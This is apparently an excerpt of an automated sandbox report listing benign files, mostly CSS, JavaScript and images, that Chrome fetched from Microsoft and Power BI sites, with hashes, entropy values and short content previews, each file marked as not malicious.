                                                                                                                                                                                                          Preview:.editing .appBarContent{background:var(--neutral-light-color,#eaeaea)}.editing .appBarContent ul>li button{color:var(--neutral-primary-color,#333)}.editing .appBarContent ul>li button:focus{background-color:transparent}.editing .appBarContent ul>li button.active,.editing .appBarContent ul>li button:hover{background-color:var(--neutral-tertiary-alt-color,#c8c8c8)}@media screen and (max-width:1700px){.editing .appBarContent .right .errorMessage,.editing .appBarContent .right span:not(.displayOnSmallScreen){display:none}}.reading .appBarContent{background:var(--neutral-primary-color,#333)}.reading .appBarContent ul>li button{color:var(--white-color,#fff)}.reading .appBarContent ul>li button:hover{background-color:var(--neutral-primary-color-alt2,#4a4a4a)}.reading .appBarContent ul>li button:focus{background-color:transparent}.explorationContainer .appBarContent .resetUserState:not([disabled]) i.glyphicon{align-items:center;background-color:var(--theme-primary-color,#f2c811);border-radius:
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:PNG image data, 65 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                          Entropy (8bit):4.035372245524404
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:yionv//thPlMflHxfAkxl/k4E08up:6v/lhPqbAk7Tp
                                                                                                                                                                                                          MD5:C097CE28EDF0E427646E7A587A81F844
                                                                                                                                                                                                          SHA1:6FB5C2DD52ECCC97E982FB4B9D1E88EAF1E5CBCA
                                                                                                                                                                                                          SHA-256:19C38A28DC85C3E3B6469E2CBF092FA59892365F90CC60FA092E5FF18E2B3BFE
                                                                                                                                                                                                          SHA-512:910B61B643BD3C09AC76FD443BB25DEAC68BAA742F9061E7CD79A3B94A80DB404D370E31E63F1AD9CCB4617A8799A78FDD02B763490182B444EC559E25AC3361
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...A.........*..-....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (26038)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1075474
                                                                                                                                                                                                          Entropy (8bit):5.534428681365511
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:02IQNvWXig0OTihO3oLGiUL3JChKlJUhtj1HzKi1vQIkuEiWP6VMZwyHjYenicPi:02IQNqig0OTihO3oLGiUL3JChKlJUhtl
                                                                                                                                                                                                          MD5:A04F2FF29F634FD5E947FD4F3FBA03E9
                                                                                                                                                                                                          SHA1:717D9163AB90316733CDD9FDC37274F049CB5AFD
                                                                                                                                                                                                          SHA-256:452ADED02F6E123BC6057BBDF3FFE37EC3BC070DA98A8B38245B59939F329AAC
                                                                                                                                                                                                          SHA-512:58400AFF1729E84EBB23C218DAC8AD3602C81153B0D3BC47C0930DE0D21CB30BDF2CD0F0605143BD8BF0E6C0809B272D078A67427B9472F627FB35341D73F15C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:// Universal Media Player.// Build Date: 2024-12-10T18:10:35.199Z.// Commit: 457ba7eed109cd2eb5a13e7d89a84058a614b049.// Build Number: 20241210.01../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1976
                                                                                                                                                                                                          Entropy (8bit):4.4820518319503835
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:+cntsSY/J2UDI2sGulM/wlN1vq0GAg/QK0j2rQzMGuFiFmGIGuFrFmGdqs:PnOSYhJDIJlMolN1wv0/yUFYNFvqs
                                                                                                                                                                                                          MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                                                                                                                                                          SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                                                                                                                                                          SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                                                                                                                                                          SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:PNG image data, 65 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                          Entropy (8bit):4.035372245524404
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:yionv//thPlMflHxfAkxl/k4E08up:6v/lhPqbAk7Tp
                                                                                                                                                                                                          MD5:C097CE28EDF0E427646E7A587A81F844
                                                                                                                                                                                                          SHA1:6FB5C2DD52ECCC97E982FB4B9D1E88EAF1E5CBCA
                                                                                                                                                                                                          SHA-256:19C38A28DC85C3E3B6469E2CBF092FA59892365F90CC60FA092E5FF18E2B3BFE
                                                                                                                                                                                                          SHA-512:910B61B643BD3C09AC76FD443BB25DEAC68BAA742F9061E7CD79A3B94A80DB404D370E31E63F1AD9CCB4617A8799A78FDD02B763490182B444EC559E25AC3361
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f0940fe6c4f4373/1733959740242/qZT9_F68n3xQwRy
                                                                                                                                                                                                          Preview:.PNG........IHDR...A.........*..-....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1238
                                                                                                                                                                                                          Entropy (8bit):7.762139796417613
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:hU1mDHXJgMfO7ky7ApZsD6xuPPGxJsN+Q8Fw0/g5suF9zR+2/:ZDWMWZUpg6YHGxSUpFMT/
                                                                                                                                                                                                          MD5:E206A414839ECEFD736493FB77DEDEDD
                                                                                                                                                                                                          SHA1:204FD11DCEA0FDD54A6547F6093E675691DD5E01
                                                                                                                                                                                                          SHA-256:A12055D52F7150061AF6075F344857C1B52CB5DA70CB1A5DA5E515F9ED2E88F3
                                                                                                                                                                                                          SHA-512:05FFF8E484715F56FBB3FD46D18C52B0C8050AE9E3E8D30C1DA59B521E634BA45B37947A94C7FABDEC05EC1CA4CE228FD49F234AF43B082A703BC188DBE78DC8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../_....Em.1....#..".?..F..@}...lj.UU-.,Fz.IZ.i#....|y.i.}....$........I..m./c..........\._:...~..p..^........U..<...$Yu.33...o....b.Qf<....LQ.$I.$./3...{.|Wit.m[.'...$...V...R%P1...;..6`... ..P.;....1...[...3.....##Xpd.....#...#..;....N#_c.K.|..~..|..b?.#....Y.....Y.W.......3)$.A.p...._.../.....\.pd8.N......|z..'............$......../.p]..:....U...-6..j.*4.....W*.(iR..(.!..J!U..l..D..$. V...JR,...z.....J.+9.EE5P.&...?..Ah5T.;.>..!-......Z)A.(....]w..7.&a...x..A.(.....S..0...o/....N1.F.P...Z% ..lR......(4*.W:.H.J......jR...J.....@b&PRD.... ..d#.3....F.2..(.ImY3...(.5BM...TNb....1#M1.&i.2.....^4...... EZC.j.. "6..........'.a.._..o.}~......a.(E..?].q...ImM......7.....2i.*M...D..N[....,.6tH...>=...jZ=.A.\...k.CS.LM0J8;.Sh..jZ..JJY 2l.0)5..J..jJ#.Z.%.%.@N.(M)E`@.e.4.4...z.....1..!.)..Uk5=D5ATJ. .Fb41.. ..F.5e.Xa...l...Tg..FR%fb.f`.Ih.Q6..0#...1.. .@.....Z......*...L.h& .H..8.n.i..$3...&1..0....$.d.v.;.....$%..)...`...D%.lPC-....FC..cb..D....
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23842), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):23842
                                                                                                                                                                                                          Entropy (8bit):5.111281845529365
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:6Zrj8/Ia/tdKwRSWy7eRSw+vuGr9q8XDmw2RP5njKnaSgR0vur:W+7+vuGdYKaDr
                                                                                                                                                                                                          MD5:AB645EFAA3FFFA570F6A2B4CD2E07BF5
                                                                                                                                                                                                          SHA1:45FEBE62502627AE464D018728F44C79EC56C9E4
                                                                                                                                                                                                          SHA-256:2BB1C9568BEF6442B489F86B3AB288D9092EBA13F4EE91DD55FC0A50B34288E2
                                                                                                                                                                                                          SHA-512:F46AD1BEB1754C92E3CECDD9C7DA6DDB765C93AF2AA3FE071F7321927EBA174E3455B779508F6D3DFA6B041B5DD86077BEE7C747D6BD0F4A10E758A979F40D38
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.common.externals.min.45febe62502627ae464d.css
                                                                                                                                                                                                          Preview:/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:0 0}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inh
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):2714
                                                                                                                                                                                                          Entropy (8bit):3.88910583811547
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:n/oHbBhnCBISZouithR7n/JJZ8ZrjRK8SDOQERYRjgHl7o74E7IacnEo3Xg6UIh:ngHLQ4ughRDJApjR3v9IjgW7Rcg6Uc
                                                                                                                                                                                                          MD5:6DAED1E6E97ABE3DE61F9C2316C3EC4A
                                                                                                                                                                                                          SHA1:5D7369742BC9211CD82DEF74ECE49AAE6E09F384
                                                                                                                                                                                                          SHA-256:C8FAD58FB046C7BF1C02E506300FD49B34156CCDD3123C755E9BC61C259DDD14
                                                                                                                                                                                                          SHA-512:A3149E4E36F2998F30C7458F42DF741FA4F82DA3E28174D836A52C75565BE29AE2ECD6F508853D2D0C015A6DC1B141C652A19A13B5CB031548024580FEB30776
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases4?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M15.2963 15.8965C16.4558 15.8965 17.3958 16.8365 17.3958 17.996L17.3945 19.1502C17.5345 21.7765 15.5818 23.1057 12.0772 23.1057C8.58737 23.1057 6.59841 21.7982 6.59841 19.1957V17.996C6.59841 16.8365 7.53839 15.8965 8.69791 15.8965H15.2963ZM15.2963 17.6961H8.69791C8.53226 17.6961 8.39798 17.8304 8.39798 17.996V19.1957C8.39798 20.6068 9.46173 21.3061 12.0772 21.3061C14.6781 21.3061 15.6713 20.6301 15.5963 19.1981V17.996C15.5963 17.8304 15.462 17.6961 15.2963 17.6961ZM2.0995 9.89798L7.34943 9.89808C7.25075 10.2815 7.19827 10.6835 7.19827 11.0977C7.19827 11.3006 7.21086 11.5005 7.23531 11.6968L2.0995 11.6975C1.93385 11.6975 1.79957 11.8318 1.79957 11.9975V13.1972C1.79957 14.6083 2.86331 15.3075 5.47883 15.3075C6.03298 15.3075 6.51415 15.2768 6.92755 15.2147C6.24951 15.6442 5.74117 16.3152 5.52014 17.1061L5.47883 17.1071C1.98896 17.1071 0 15.7996 0 13.1972V11.9975C0 10.838 0.939976 9.897
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):104501
                                                                                                                                                                                                          Entropy (8bit):4.954510960817137
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:1/yXWtZT2RuSuhF7bmGQmbikKhMMmZJlHE:1/yXWtZT2RuSuhF7bmGQmbikKhMMmZJy
                                                                                                                                                                                                          MD5:40E14992512D209FA73CDDA4D48306D8
                                                                                                                                                                                                          SHA1:4A1A13972DA0A85C167F343E9A9814906AE6A9F3
                                                                                                                                                                                                          SHA-256:27793549905C02A44D9E37BC8172BA3CA423F86B324B41B6549132C37FFCD618
                                                                                                                                                                                                          SHA-512:A8D6B3180361F56838CEC6D9588C64DE62B095DA203AD61A57D7F66382DED9DBDE69A30182027B83E6B0B02DAAFA092F778BC9818FB620B36F2AEF0090158FF0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/visuals.min.4a1a13972da0a85c167f.css
                                                                                                                                                                                                          Preview:.webChart .webChartAxis{fill:none;stroke:#ddd;stroke-width:1px}.webChart .firstInstance{fill:rgba(235,94,94,.25);stroke:#eb5e5e;stroke-width:2px}.webChart .secondInstance{fill:rgba(131,209,52,.25);stroke:#83d134;stroke-width:2px}.webChart .webChartTitleLabel{font-size:14px;font-family:'Segoe UI Semibold',wf_segoe-ui_semibold,helvetica,arial,sans-serif}.webChart .webChartValueLabel{font-size:14px}.partitionMap{font-size:13px}.partitionMap .partition{stroke:#fff;stroke-width:2px}.partitionMap .label{fill:#fff}@media print{.slicer-container .scrollRegion{height:auto!important}.slicer-container .scrollRegion .visibleGroup{transform:translate(0,0)!important}}.visual .direct-edit-placeholder-outline{position:absolute;border:1px #000 dashed;cursor:text}.visual .flex{display:flex;display:-webkit-flex}.visual .flex-row{display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row}.visual .flex-column{display:flex;display:-webkit-flex;flex-direction:column;-webkit-flex-directio
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (526)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1683
                                                                                                                                                                                                          Entropy (8bit):4.981226266363334
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:vvJ/iwjBViZF/HGbP4aSnlS9DT/PY11oBJ:nJ6MTmF/HegaSMZ
                                                                                                                                                                                                          MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                                                                                                                                                          SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                                                                                                                                                          SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                                                                                                                                                          SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-market-layer.min.ACSHASH551a5d1b5ebf715e3f78c311a57fa1d7.js
                                                                                                                                                                                                          Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):414236
                                                                                                                                                                                                          Entropy (8bit):5.24862189846503
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:hkbWIpN7sDiZg2dySA9skOF3Y3qeRTSB1DkCXW+dlVmCK3RMW7dzc:KbWIpN7+sn3QSB1DkCXW+dlVmCK3Z5w
                                                                                                                                                                                                          MD5:AA971C763DEED05B0FBB2CF7FE1FF4D7
                                                                                                                                                                                                          SHA1:AADCDBF89469A582EE57EE999BE80BD405624B35
                                                                                                                                                                                                          SHA-256:E331AFC6CAF89D878B2CF22C4B8777AD2C97ADB5D555AE060CF308DAA65BCB84
                                                                                                                                                                                                          SHA-512:18DFFB73F0EE8AD2B0D965DF37B26187D8A869737D36C713AF31E9202A2C55E97D27B830A85DD1A9C8FE8A1ABBACF7E6D72FC4DFEF65B029B9BF70A1133DAFDE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/signInProvider.min.b471cf2a441e10401a79.js
                                                                                                                                                                                                          Preview:!function(){"use strict";var M,R,hr={954:function(M,R,f){f.d(R,{X:function(){return F}});var y=f(519),v=f(589);class F extends y.xQ{constructor(w){super(),this._value=w}get value(){return this.getValue()}_subscribe(w){var A=super._subscribe(w);return A&&!A.closed&&w.next(this._value),A}getValue(){if(this.hasError)throw this.thrownError;if(this.closed)throw new v.N;return this._value}next(w){super.next(this._value=w)}}},149:function(M,R,f){f.d(R,{P:function(){return g}});var y=f(894),F=f(118),d=f(578),A=f(146);var g=(()=>{class T{constructor(b,Z,Q){this.kind=b,this.value=Z,this.error=Q,this.hasValue="N"===b}observe(b){switch(this.kind){case"N":return b.next&&b.next(this.value);case"E":return b.error&&b.error(this.error);case"C":return b.complete&&b.complete()}}do(b,Z,Q){switch(this.kind){case"N":return b&&b(this.value);case"E":return Z&&Z(this.error);case"C":return Q&&Q()}}accept(b,Z,Q){return b&&"function"==typeof b.next?this.observe(b):this.do(b,Z,Q)}toObservable(){switch(this.kind){c
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (42133)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):138268
                                                                                                                                                                                                          Entropy (8bit):5.224497765711851
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                                                                                                          MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                                                                                                          SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                                                                                                          SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                                                                                                          SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):4214
                                                                                                                                                                                                          Entropy (8bit):4.079345582529821
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:CGuEyC5PrqVOGeyEg56k1/BTuVSizv9e7LXFRhg1ao/sZ+J:Vf5TkQytMk1M44ctRe1a6sZg
                                                                                                                                                                                                          MD5:0A4D0DBD3AFB2A6D5DFCE2967FEF332A
                                                                                                                                                                                                          SHA1:52AFE4A5D39B0998DAC7121472EBAD554718A13C
                                                                                                                                                                                                          SHA-256:39AF3568389F5B78BFFFAF09DD4D781D631DA77EE427E2434AC9C3049F39A659
                                                                                                                                                                                                          SHA-512:F7FA8753156A62391FCCF7B05C2F35BD86034B31ED39374B3E3F6A19FA74579F6237FFB35259E5959B55A94B8F8909FA6C54FAD6CD423BB04C3D742F894F4957
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/images/microsoft_logo.c09ca4bc0d7a834baaec.svg
                                                                                                                                                                                                          Preview:<svg width="338" height="72" viewBox="0 0 338 72" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0)">..<path d="M140.4 14.4V57.6H132.9V23.7H132.8L119.4 57.6H114.4L100.7 23.7H100.6V57.6H93.7V14.4H104.5L116.9 46.4H117.1L130.2 14.4H140.4V14.4ZM146.6 17.7C146.6 16.5 147 15.5 147.9 14.7C148.8 13.9 149.8 13.5 151 13.5C152.3 13.5 153.4 13.9 154.2 14.8C155 15.6 155.5 16.6 155.5 17.8C155.5 19 155.1 20 154.2 20.8C153.3 21.6 152.3 22 151 22C149.7 22 148.7 21.6 147.9 20.8C147.1 19.8 146.6 18.8 146.6 17.7ZM154.7 26.6V57.6H147.4V26.6H154.7ZM176.8 52.3C177.9 52.3 179.1 52 180.4 51.5C181.7 51 182.9 50.3 184 49.5V56.3C182.8 57 181.5 57.5 180 57.8C178.5 58.1 176.9 58.3 175.1 58.3C170.5 58.3 166.8 56.9 164 54C161.1 51.1 159.7 47.4 159.7 43C159.7 38 161.2 33.9 164.1 30.7C167 27.5 171.1 25.9 176.5 25.9C177.9 25.9 179.2 26.1 180.6 26.4C182 26.8 183.1 27.2 183.9 27.6V34.6C182.8 33.8 181.6 33.1 180.5 32.7C179.3 32.2 178.1 32 176.9 32C174 32 171.7 32.9 169.9 34.8C168.1 36.7 167.2 39.2
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (26038)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1075474
                                                                                                                                                                                                          Entropy (8bit):5.534428681365511
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:02IQNvWXig0OTihO3oLGiUL3JChKlJUhtj1HzKi1vQIkuEiWP6VMZwyHjYenicPi:02IQNqig0OTihO3oLGiUL3JChKlJUhtl
                                                                                                                                                                                                          MD5:A04F2FF29F634FD5E947FD4F3FBA03E9
                                                                                                                                                                                                          SHA1:717D9163AB90316733CDD9FDC37274F049CB5AFD
                                                                                                                                                                                                          SHA-256:452ADED02F6E123BC6057BBDF3FFE37EC3BC070DA98A8B38245B59939F329AAC
                                                                                                                                                                                                          SHA-512:58400AFF1729E84EBB23C218DAC8AD3602C81153B0D3BC47C0930DE0D21CB30BDF2CD0F0605143BD8BF0E6C0809B272D078A67427B9472F627FB35341D73F15C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/videoplayer/ump.mjs
                                                                                                                                                                                                          Preview:// Universal Media Player.// Build Date: 2024-12-10T18:10:35.199Z.// Commit: 457ba7eed109cd2eb5a13e7d89a84058a614b049.// Build Number: 20241210.01../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (590)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1716
                                                                                                                                                                                                          Entropy (8bit):5.2304068952006615
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                                                                                                          MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                                                                                                          SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                                                                                                          SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                                                                                                          SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
